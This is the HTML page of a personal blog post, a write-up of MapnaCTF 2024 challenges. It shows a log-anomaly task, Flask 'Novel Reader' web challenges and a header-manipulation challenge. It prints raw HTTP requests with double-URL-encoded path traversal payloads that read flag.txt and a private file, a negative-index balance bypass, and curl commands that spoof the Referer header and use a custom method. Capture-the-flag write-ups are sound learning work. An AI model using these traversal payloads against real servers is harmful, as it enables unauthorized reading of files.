<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="megat">


    <meta name="subtitle" content="that one socially inept kid">


    <meta name="description" content="whoami">


    <meta name="keywords" content="aan, megat, ilikeronnnnii">


<title>MapnaCTF 2024 | aan</title>



    <link rel="icon" href="/favicon.png">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


<meta name="generator" content="Hexo 7.3.0"></head>

<body>
    <script>
        // this function is used to check current theme before page loaded.
        (() => {
            const currentTheme = window.localStorage && window.localStorage.getItem('theme') || '';
            const isDark = currentTheme === 'dark';
            const pagebody = document.getElementsByTagName('body')[0]
            if (isDark) {
                pagebody.classList.add('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Dark"
            } else {
                pagebody.classList.remove('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Light"
            }
        })();
    </script>

    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">aan&#39;s stash</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/music">Music</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">aan&#39;s stash</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/music">Music</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
            <div class="main">
                <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    var tocbot_timer;
    var DEPTH_MAX = 6; // 为 6 时展开所有
    var tocbot_default_config = {
        tocSelector: '.tocbot-list',
        contentSelector: '.post-content',
        headingSelector: 'h1, h2, h3, h4, h5',
        orderedList: false,
        scrollSmooth: true,
        onClick: extend_click,
    };

    function extend_click() {
        clearTimeout(tocbot_timer);
        tocbot_timer = setTimeout(function() {
            tocbot.refresh(obj_merge(tocbot_default_config, {
                hasInnerContainers: true
            }));
        }, 420); // 这个值是由 tocbot 源码里定义的 scrollSmoothDuration 得来的
    }

    document.ready(function() {
        tocbot.init(obj_merge(tocbot_default_config, {
            collapseDepth: 1
        }));
    });

    function expand_toc() {
        var b = document.querySelector('.tocbot-toc-expand');
        var expanded = b.getAttribute('data-expanded');
        expanded ? b.removeAttribute('data-expanded') : b.setAttribute('data-expanded', true);
        tocbot.refresh(obj_merge(tocbot_default_config, {
            collapseDepth: expanded ? 1 : DEPTH_MAX
        }));
        b.innerText = expanded ? 'Expand all' : 'Collapse all';
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

    function obj_merge(target, source) {
        for (var item in source) {
            if (source.hasOwnProperty(item)) {
                target[item] = source[item];
            }
        }
        return target;
    }
</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">MapnaCTF 2024</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">megat</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">January 20, 2024&nbsp;&nbsp;13:35:07</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/categories/Writeups/">Writeups</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <blockquote>
<p>This is the first CTF I’ve ever played in 2024. I didn’t expect much from the results since I got my finals a week after this event (though I barely focused on it, too).</p>
</blockquote>
<p><img src="/images/mapnaimage.png" alt="alt text"></p>
<h2 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h2><h3 id="Tampered"><a href="#Tampered" class="headerlink" title="Tampered"></a>Tampered</h3><p>So, first of all, when you open the folder, there is a txt file named flags.txt; inside it, there are about 31339 lines of potential flags. Nothing special; detect the anomaly.</p>
<p><img src="/images/mapnaimage2.png" alt="alt text"></p>
<p>I gave a quick scroll through and noticed a difference here; a line was skipped, submitted the flag, and it went through</p>
<p><img src="/images/mapnaimage3.png" alt="alt text"></p>
<p>flag <code>MAPNA&#123;Tx,D51otN\eUf7qQ7&gt;ToSYQ;5P6jTIHH#6TL+uv&#125;</code></p>
<h2 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h2><h3 id="Novel-Reader"><a href="#Novel-Reader" class="headerlink" title="Novel Reader"></a>Novel Reader</h3><p>The funny thing is I managed to solve Novel Reader 2 first instead of 1 because I couldn’t find where the first flag file was located. First, I opened the docker environment to understand the program’s source code. It’s a web application built using the Flask framework in Python.</p>
<p><img src="/images/mapnaimage4.png" alt="alt text"></p>
<p>And the most important thing… the flag.txt<br>I couldn’t find it until the very last minute when I discovered it was in the root folder.<br>So, how do you read it? Well, there is a read function that you can bypass from this code block.</p>
<p><img src="/images/mapnaimage5.png" alt="alt text"></p>
<p>How so? By using the double URL encoding method from <code>../../</code> to <code>%252e%252e%252f%252e%252e%252fflag.txt</code></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">GET /api/read/public/%252e%252e%252f%252e%252e%252fflag.txt HTTP/1.1</span><br><span class="line">Accept: */*</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: en-US, en</span><br><span class="line">Connection: keep-alive</span><br><span class="line">Cookie: session=eyJjcmVkaXQiOjEwMCwid29yZHNfYmFsYW5jZSI6MX0.Za000Q.zcBtJvYM3vXoJBf_o6j8gd_g9n4</span><br><span class="line">Host: 3.64.250.135:9000</span><br><span class="line">Referer: http://3.64.250.135:9000/</span><br><span class="line">Sec-GPC: 1</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36</span><br><span class="line">X-Requested-With: XMLHttpRequest</span><br></pre></td></tr></table></figure>

<p>flag <code>MAPNA&#123;uhhh-1-7h1nk-1-f0r607-70-ch3ck-cr3d17&gt;0-4b331d4b&#125;</code></p>
<h3 id="Novel-Reader-2"><a href="#Novel-Reader-2" class="headerlink" title="Novel Reader 2"></a>Novel Reader 2</h3><p>In Novel Reader 2, all you have to do is show the content of a private novel, but to do so, you need to ensure you have sufficient balance.</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">@app.<span class="title function_">get</span>(<span class="string">&#x27;/api/read/&lt;path:name&gt;&#x27;</span>)</span><br><span class="line">def <span class="title function_">readNovel</span>(name):</span><br><span class="line">    name = <span class="title function_">unquote</span>(name)</span><br><span class="line">    <span class="keyword">if</span>(not name.<span class="title function_">startswith</span>(<span class="string">&#x27;public/&#x27;</span>)):</span><br><span class="line">        <span class="keyword">return</span> &#123;<span class="string">&#x27;success&#x27;</span>: <span class="title class_">False</span>, <span class="string">&#x27;msg&#x27;</span>: <span class="string">&#x27;You can only read public novels!&#x27;</span>&#125;, <span class="number">400</span></span><br><span class="line">    buf = <span class="title function_">readFile</span>(name).<span class="title function_">split</span>(<span class="string">&#x27; &#x27;</span>)</span><br><span class="line">    buf = <span class="string">&#x27; &#x27;</span>.<span class="title function_">join</span>(buf[<span class="number">0</span>:session[<span class="string">&#x27;words_balance&#x27;</span>]])+<span class="string">&#x27;... Charge your account to unlock more of the novel!&#x27;</span></span><br><span class="line">    <span class="keyword">return</span> &#123;<span class="string">&#x27;success&#x27;</span>: <span class="title class_">True</span>, <span class="string">&#x27;msg&#x27;</span>: buf&#125; </span><br></pre></td></tr></table></figure>

<p>However, there is a negative indexing feature in Python, which will give access to the second last index if you use the value. <code>-1</code></p>
<p>Once you manage to do so, use the double encoding method to access the private novel reader file.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">GET /api/read/public/%252e%252e%252f/private/A-Secret-Tale.txt HTTP/1.1</span><br><span class="line">Accept: */*</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: en-US,en</span><br><span class="line">Connection: keep-alive</span><br><span class="line">Cookie: session=eyJjcmVkaXQiOjEwMCwid29yZHNfYmFsYW5jZSI6MX0.Za000Q.zcBtJvYM3vXoJBf_o6j8gd_g9n4</span><br><span class="line">Host: 3.64.250.135:9000</span><br><span class="line">Referer: http://3.64.250.135:9000/</span><br><span class="line">Sec-GPC: 1</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36</span><br><span class="line">X-Requested-With: XMLHttpRequest</span><br></pre></td></tr></table></figure>

<p>flag <code>MAPNA&#123;uhhh-y0u-607-m3-4641n-3f4b38571&#125;</code></p>
<h3 id="Flag-Holding"><a href="#Flag-Holding" class="headerlink" title="Flag Holding"></a>Flag Holding</h3><p>This challenge is more into changing the header request. First, we were given a link to a website:<code> http://18.184.219.56:8080/</code></p>
<p><img src="/images/mapnaimage6.png" alt="alt text"></p>
<p>Now set the Referer request header to <code>http://flagland.internal/</code>. I use curl, but you can also use Burp Suite to edit the request header.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl http://18.184.219.56:8080/ -e <span class="string">&quot;http://flagland.internal/&quot;</span></span><br></pre></td></tr></table></figure>

<p><img src="/images/mapnaimage7.png" alt="alt text"></p>
<p>Now, it wants you to add a parameter.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl http://18.184.219.56:8080/?secret=1 -e <span class="string">&quot;http://flagland.internal/&quot;</span></span><br></pre></td></tr></table></figure>

<p>And then, look at the comment in the HTML source code</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">div</span> <span class="attr">class</span>=<span class="string">&quot;msg&quot;</span> <span class="attr">style</span>=<span class="string">&quot;&quot;</span>&gt;</span></span><br><span class="line">		Incorrect secret. <span class="comment">&lt;!-- hint: secret is ____, which is the name of the protocol that both this server and your browser agree on... --&gt;</span>	<span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>Therefore, add the argument with http.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl http://18.184.219.56:8080/?secret=http -e <span class="string">&quot;http://flagland.internal/&quot;</span></span><br></pre></td></tr></table></figure>

<p>Change the method to FLAG</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">div</span> <span class="attr">class</span>=<span class="string">&quot;msg&quot;</span> <span class="attr">style</span>=<span class="string">&quot;&quot;</span>&gt;</span></span><br><span class="line">	Sorry we don&#x27;t have &quot;GET&quot; here but we might have other things like &quot;FLAG&quot;.	<span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl http://18.184.219.56:8080/?secret=http -e <span class="string">&quot;http://flagland.internal/&quot;</span> -X FLAG</span><br></pre></td></tr></table></figure>

<p>flag <code>MAPNA&#123;533m5-l1k3-y0u-kn0w-h77p-1836a2f&#125;</code></p>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="https://ilikeronnnnii.github.io/2024/01/21/mapnactf/">https://ilikeronnnnii.github.io/2024/01/21/mapnactf/</a></span>
                    </p>
                

            </section>
        
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2024/02/17/lactf/">LACTF 2024</a>
            
            
        </section>


    </article>
</div>

            </div>
            <!-- if youre feeling like a stupid chungus loser today i want you to know that i think youre lowkirkenuinly the 6 to my 7 -->

    </div>
</body>

</html>